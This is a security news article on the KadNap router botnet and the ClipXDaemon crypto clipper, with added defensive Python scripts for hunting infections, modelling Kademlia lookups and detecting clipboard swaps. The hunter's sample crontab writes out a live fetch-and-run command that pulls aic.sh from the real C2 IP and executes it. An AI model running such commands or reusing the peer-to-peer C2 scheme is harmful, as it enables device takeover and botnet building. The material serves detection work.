Cybersecurity researchers have discovered a new malware family called KadNap that primarily targets Asus routers to enlist them into a botnet used to proxy malicious traffic.
The malware, first detected in the wild in August 2025, has grown to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. Smaller numbers of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain.
"KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring," the cybersecurity company said in a report shared with The Hacker News.
Compromised nodes in the network use the DHT protocol to locate and connect to a command-and-control (C2) server, which makes the botnet resilient to detection and disruption efforts.
Once devices are successfully compromised, they are advertised through a proxy service named Doppelgänger ("doppelganger[.]store"), which is assessed to be a rebrand of Faceless, another proxy service associated with the TheMoon malware. Doppelgänger, according to its website, claims to offer residential proxies in over 50 countries that provide "100% anonymity." The service is said to have launched in May/June 2025.
Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.
Central to the attack is a shell script ("aic.sh") downloaded from the C2 server ("212.104.141[.]140"), which is responsible for initiating the process of conscripting the victim into the P2P network. The script creates a cron job that retrieves the shell script from the server at the 55-minute mark of every hour, renames it to ".asusrouter," and runs it.
Once persistence is established, the script pulls a malicious ELF file, renames it to "kad," and executes it. This, in turn, leads to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors.
KadNap is also designed to connect to a Network Time Protocol (NTP) server to fetch the current time and store it alongside the host's uptime. These values are used to derive a hash that the bot uses to locate other peers in the decentralized network, from which it receives commands or downloads additional files.
Those files, fwr.sh and /tmp/.sose, contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and to extract a list of C2 IP address:port combinations to connect to.
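The persistence chain described above (hourly cron job at minute 55, the renamed ".asusrouter" stager, the "kad" ELF and the follow-on files) can be hunted for on a Linux/BusyBox router with a few text checks over `crontab -l` and `ps` output. The script below is an added example written for this article, not Lumen's tooling; the indicators are taken from the write-up, kept defanged as published, and the crontab and process listings at the bottom are constructed to imitate the described behaviour, not captured from an infected device. The exact cron command line used by the real stager is not published, so the sample line is an assumption.

```python
"""Hunt for the KadNap persistence chain on a Linux/BusyBox router (added example)."""
import os
import re
from typing import Dict, List

# Indicators from the write-up, kept defanged exactly as published.
KADNAP_C2 = "212.104.141[.]140"
KADNAP_NAMES = {"aic.sh", ".asusrouter", "kad", "fwr.sh", ".sose"}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a string that will match real command output."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split `crontab -l` output into entries, skipping comments, blanks and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:  # @reboot-style or malformed lines are not hourly jobs
            continue
        keys = ("minute", "hour", "dom", "month", "dow", "command")
        entries.append(dict(zip(keys, fields)))
    return entries


def suspicious_cron_entries(text: str) -> List[str]:
    """Return cron commands matching the KadNap pattern: any job naming the C2 or the
    stager files, or a job at minute 55 of every hour that pulls something with wget/curl/tftp."""
    c2 = refang(KADNAP_C2)
    hits = []
    for e in parse_crontab(text):
        cmd = e["command"]
        names_ioc = c2 in cmd or any(n in cmd for n in ("aic.sh", ".asusrouter"))
        hourly_at_55 = e["minute"] == "55" and e["hour"] == "*"
        downloads = re.search(r"\b(wget|curl|tftp)\b", cmd) is not None
        if names_ioc or (hourly_at_55 and downloads):
            hits.append(cmd)
    return hits


def suspicious_processes(ps_text: str) -> List[str]:
    """Return command lines from `ps` output whose argv contains one of the dropped file
    names. Assumes BusyBox column layout (PID USER VSZ STAT COMMAND) with a header row."""
    hits = []
    for line in ps_text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        cmd = parts[4]
        if any(os.path.basename(tok) in KADNAP_NAMES for tok in cmd.split()):
            hits.append(cmd)
    return hits


# Constructed samples imitating the behaviour described in the article (assumed
# command line; not captured from a real infection).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/sbin:/usr/sbin:/bin:/usr/bin
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter
"""

SAMPLE_PS = """\
  PID USER       VSZ STAT COMMAND
    1 admin     1204 S    /sbin/init
  412 admin     3216 S    /usr/sbin/httpd
 2291 admin     1188 S    sh /tmp/.asusrouter
 2305 admin     2440 S    /tmp/kad
"""

if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", hit)
    for hit in suspicious_processes(SAMPLE_PS):
        print("proc:", hit)
```

On a live device the same functions can be fed the real output of `crontab -l` (or the contents of /var/spool/cron/crontabs) and `ps`. The minute-55 heuristic is deliberately broader than the published indicators so that a re-hosted stager with a new IP and file name is still caught; expect to review the hits by hand.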
"In short, the innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, by hiding in the noise of legitimate peer-to-peer traffic," Lumen said.
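What makes a Kademlia-style lookup hard to block is that the bot never needs a hard-coded C2 address: it only needs a key (here derived from NTP time and uptime) and at least one reachable peer, and the XOR metric steers it towards whichever nodes currently hold the value for that key. The code below is an added example of that lookup, not KadNap's code. The article does not publish the bot's hash construction, identifier width or the changes in its custom protocol, so `rendezvous_key` is a stand-in and the peer tables are constructed.

```python
"""Kademlia-style FIND_NODE lookup with the XOR metric (added example, not KadNap's code)."""
import hashlib
from typing import Dict, List, Tuple

Peer = Tuple[int, str]   # (node ID, "ip:port")
ID_BITS = 160            # standard Kademlia uses 160-bit SHA-1 identifiers
K = 3                    # bucket size; real networks use k=8 or k=20


def node_id(label: bytes) -> int:
    """Derive a node identifier from an arbitrary label (e.g. a peer's address)."""
    return int.from_bytes(hashlib.sha1(label).digest(), "big")


def rendezvous_key(ntp_time: int, uptime: int, window: int = 3600) -> int:
    """Stand-in for the bot's hash (assumption, not the published scheme): bucket the
    NTP time and the uptime so that bots computing it within the same window agree
    on one key, which is the value every bot then searches for."""
    material = f"{ntp_time // window}:{uptime // window}".encode()
    return node_id(material)


def xor_distance(a: int, b: int) -> int:
    """The Kademlia metric: XOR of two identifiers, compared as an integer."""
    return a ^ b


def closest_peers(key: int, peers: List[Peer], k: int = K) -> List[Peer]:
    """Return the k peers whose IDs are XOR-closest to `key`, nearest first."""
    return sorted(peers, key=lambda p: xor_distance(key, p[0]))[:k]


def iterative_lookup(key: int, known: List[Peer], routing: Dict[str, List[Peer]], k: int = K) -> List[Peer]:
    """Simplified iterative FIND_NODE: query the closest unqueried peers for the peers
    they know, merge, and stop once nothing on the shortlist is left to ask.
    `routing` maps a peer address to its known peers; it stands in for network round trips."""
    shortlist = closest_peers(key, known, k)
    queried = set()
    while True:
        to_query = [p for p in shortlist if p[1] not in queried]
        if not to_query:
            return shortlist
        for peer in to_query:
            queried.add(peer[1])
            learned = routing.get(peer[1], [])
            merged = list({q[1]: q for q in shortlist + learned}.values())
            shortlist = closest_peers(key, merged, k)


if __name__ == "__main__":
    # Constructed network: the bot knows one bootstrap peer; others are learned by asking.
    addrs = ["198.51.100.10:6881", "198.51.100.20:6881", "198.51.100.30:6881", "198.51.100.40:6881"]
    peers = [(node_id(a.encode()), a) for a in addrs]
    routing = {a: [p for p in peers if p[1] != a] for a in addrs}
    key = rendezvous_key(ntp_time=1_756_000_000, uptime=86_400)
    print(iterative_lookup(key, known=[peers[0]], routing=routing, k=2))
```

Blocking the single bootstrap peer used in the demo does not help the defender much: any other already-infected node can serve the same role, and the value under the key can be re-published elsewhere, which is the resilience the article describes. Detection therefore has to lean on the host-side artifacts and on the anomalous DHT traffic itself rather than on a C2 blocklist.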
Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is segmented by device type and model.
The Black Lotus Labs team told The Hacker News that Doppelgänger's bots are being abused by threat actors in the wild. "One challenge there has been since these Asus (and other devices) are also commonly co-infected with other malware, it's difficult to say who exactly is responsible for a specific malicious activity," the company said.
Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and no longer supported.
"The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control," Lumen concluded. "Their intention is clear, avoid detection and make it difficult for defenders to protect against."
New Linux Threat ClipXDaemon Emerges
The disclosure comes as Cyble detailed a new Linux threat dubbed ClipXDaemon that is designed to target cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware, delivered via a Linux post-exploitation framework called ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments.
Staged entirely in memory, the malware employs stealth techniques such as process masquerading and Wayland session avoidance, while polling the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It is capable of targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets.
The decision to avoid execution in Wayland sessions is deliberate: the display server protocol's security architecture places additional controls, such as requiring explicit user interaction, in front of an application's access to clipboard content. By disabling itself under such conditions, the malware aims to eliminate noise and avoid runtime failures.
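Seen from the defender's side, the behaviour described in the three paragraphs above reduces to three decisions: does a string look like a wallet address, and of which coin; did an address turn into a different address of the same coin between two polls (the clipper's tell-tale, since a user copying a new address of a different coin is normal); and is this an X11 session where background clipboard polling works at all. The script below is an added example of those checks, not Cyble's tooling or the malware. The address patterns are the commonly used format checks (no checksum validation), the environment-variable session test is an assumption about how a tool would distinguish Wayland from X11 (the article does not detail the malware's own check), and the clipboard history is constructed with made-up addresses.

```python
"""Defender-side model of clipboard-swap detection for the coins ClipXDaemon targets (added example)."""
import re
from typing import Dict, List, Optional, Tuple

BASE58 = r"[a-km-zA-HJ-NP-Z1-9]"  # Base58 alphabet: no 0, O, I, l
ADDRESS_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "bitcoin":  re.compile(rf"^(?:[13]{BASE58}{{25,34}}|bc1[a-z0-9]{{39,59}})$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "litecoin": re.compile(rf"^(?:[LM]{BASE58}{{26,33}}|ltc1[a-z0-9]{{39,59}})$"),
    "monero":   re.compile(rf"^[48]{BASE58}{{94}}$"),
    "tron":     re.compile(rf"^T{BASE58}{{33}}$"),
    "dogecoin": re.compile(rf"^D{BASE58}{{33}}$"),
    "ripple":   re.compile(r"^r[0-9a-zA-Z]{24,34}$"),
    "ton":      re.compile(r"^[EU]Q[A-Za-z0-9_-]{46}$"),
}


def classify(text: str) -> Optional[str]:
    """Return the wallet type a string looks like, or None if it is not an address."""
    text = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None


def detect_swap(previous: str, current: str) -> Optional[str]:
    """Clipper tell-tale: the clipboard held an address and now holds a *different*
    address of the *same* coin. Returns that coin, else None. A change to plain text or
    to another coin's address is treated as ordinary user activity."""
    before, after = classify(previous), classify(current)
    if before and before == after and previous.strip() != current.strip():
        return before
    return None


def replay(snapshots: List[str]) -> List[Tuple[int, str]]:
    """Run detect_swap over consecutive clipboard polls (e.g. one every 200 ms, the
    interval reported for ClipXDaemon); return (poll index, coin) for each suspected swap."""
    alerts = []
    for i in range(1, len(snapshots)):
        coin = detect_swap(snapshots[i - 1], snapshots[i])
        if coin:
            alerts.append((i, coin))
    return alerts


def session_type(env: Dict[str, str]) -> str:
    """Classify the graphical session from environment variables (assumed method).
    Under Wayland a background process cannot freely read the clipboard, which is the
    reason the article gives for the clipper standing down there."""
    if env.get("XDG_SESSION_TYPE") == "wayland" or env.get("WAYLAND_DISPLAY"):
        return "wayland"
    if env.get("XDG_SESSION_TYPE") == "x11" or env.get("DISPLAY"):
        return "x11"
    return "unknown"


# Constructed clipboard history with made-up addresses: the user copies a BTC address,
# it is silently replaced, then the user copies an ETH address.
VICTIM_BTC = "1VictimBvh3Fq8Nn2Zs7Tp4Wr9Xk6Ym5Jd"
ATTACKER_BTC = "1AttackerQz4Hs8Kd2Mn7Rv3Tw6Xb9Yc5F"
VICTIM_ETH = "0x" + "1234567890abcdef" * 2 + "12345678"
CLIPBOARD_HISTORY = [
    "meeting at 3pm",
    VICTIM_BTC,
    VICTIM_BTC,    # unchanged poll
    ATTACKER_BTC,  # same coin, different address: the swap
    VICTIM_ETH,    # different coin: the user copied something else
]

if __name__ == "__main__":
    print(replay(CLIPBOARD_HISTORY))
    print(session_type({"XDG_SESSION_TYPE": "wayland"}))
```

On a real X11 host the snapshots would come from polling `xclip -o -selection clipboard` (or `xsel -ob`) at the same 200 ms cadence; the swap heuristic then fires within one poll of the substitution. The same `classify` check is useful on the sending side: comparing the address about to be pasted into a wallet against the one originally copied is the one user-level control that defeats every clipper regardless of how it gets onto the machine.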
"ClipXDaemon differs fundamentally from traditional Linux malware. It contains no command-and-control (C2) logic, performs no beaconing, and requires no remote tasking," the company said. "Instead, it monetizes victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them in real time with attacker-controlled addresses."